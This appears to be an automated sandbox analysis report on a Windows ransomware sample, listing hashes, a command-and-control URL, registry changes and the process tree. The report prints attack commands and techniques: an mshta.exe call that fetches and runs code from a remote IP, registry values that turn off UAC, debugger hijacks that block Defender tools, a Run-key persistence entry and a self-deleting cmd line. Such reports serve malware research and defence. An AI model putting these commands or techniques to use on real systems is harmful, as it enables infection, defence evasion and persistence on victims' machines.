Analysis
-
max time kernel
18s -
max time network
23s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2022 10:24
Static task
static1
Behavioral task
behavioral1
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win10v2004-20220901-en
Errors
General
-
Target
Trojan-Ransom.Win32.Blocker.exe
-
Size
1.0MB
-
MD5
985ee7dc0de6c5081bf40ba08b93d37b
-
SHA1
9386445adf364543c10c8f11cef54cfcd4fdd54f
-
SHA256
4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
-
SHA512
ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
SSDEEP
24576:gljS8/Ns4q86Oh1Jp9cAnlwDUctAaxu19GroaJqlZJhUr:x8u4q8xXTeAnEUc6CuWroaJqFhUr
Malware Config
Extracted
http://93.115.82.248/?0=1&1=0&2=9&3=i&4=9200&5=1&6=1111&7=uphdidcbbh
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-fmjb.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4860 mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4488 guard-fmjb.exe -
Sets file execution options in registry 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-fmjb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-fmjb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-fmjb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-fmjb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-fmjb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-fmjb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-fmjb.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run guard-fmjb.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GuardSoftware = "C:\\Users\\Admin\\AppData\\Roaming\\guard-fmjb.exe" guard-fmjb.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-fmjb.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-fmjb.exe File opened for modification C:\Windows\SysWOW64\services.msc guard-fmjb.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-fmjb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 22 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "223" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4488 guard-fmjb.exe Token: SeShutdownPrivilege 4488 guard-fmjb.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4488 guard-fmjb.exe 4488 guard-fmjb.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4488 guard-fmjb.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3548 Trojan-Ransom.Win32.Blocker.exe 4488 guard-fmjb.exe 4488 guard-fmjb.exe 4636 LogonUI.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3548 wrote to memory of 4488 3548 Trojan-Ransom.Win32.Blocker.exe 81 PID 3548 wrote to memory of 4488 3548 Trojan-Ransom.Win32.Blocker.exe 81 PID 3548 wrote to memory of 4488 3548 Trojan-Ransom.Win32.Blocker.exe 81 PID 4488 wrote to memory of 4860 4488 guard-fmjb.exe 82 PID 4488 wrote to memory of 4860 4488 guard-fmjb.exe 82 PID 4488 wrote to memory of 4860 4488 guard-fmjb.exe 82 PID 3548 wrote to memory of 1476 3548 Trojan-Ransom.Win32.Blocker.exe 83 PID 3548 wrote to memory of 1476 3548 Trojan-Ransom.Win32.Blocker.exe 83 PID 3548 wrote to memory of 1476 3548 Trojan-Ransom.Win32.Blocker.exe 83 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-fmjb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-fmjb.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Roaming\guard-fmjb.exeC:\Users\Admin\AppData\Roaming\guard-fmjb.exe2⤵
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4488 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=9200&5=1&6=1111&7=uphdidcbbh"3⤵
- Blocklisted process makes network request
PID:4860
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TROJAN~1.EXE" >> NUL2⤵PID:1476
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39e6055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4636
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:2344
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee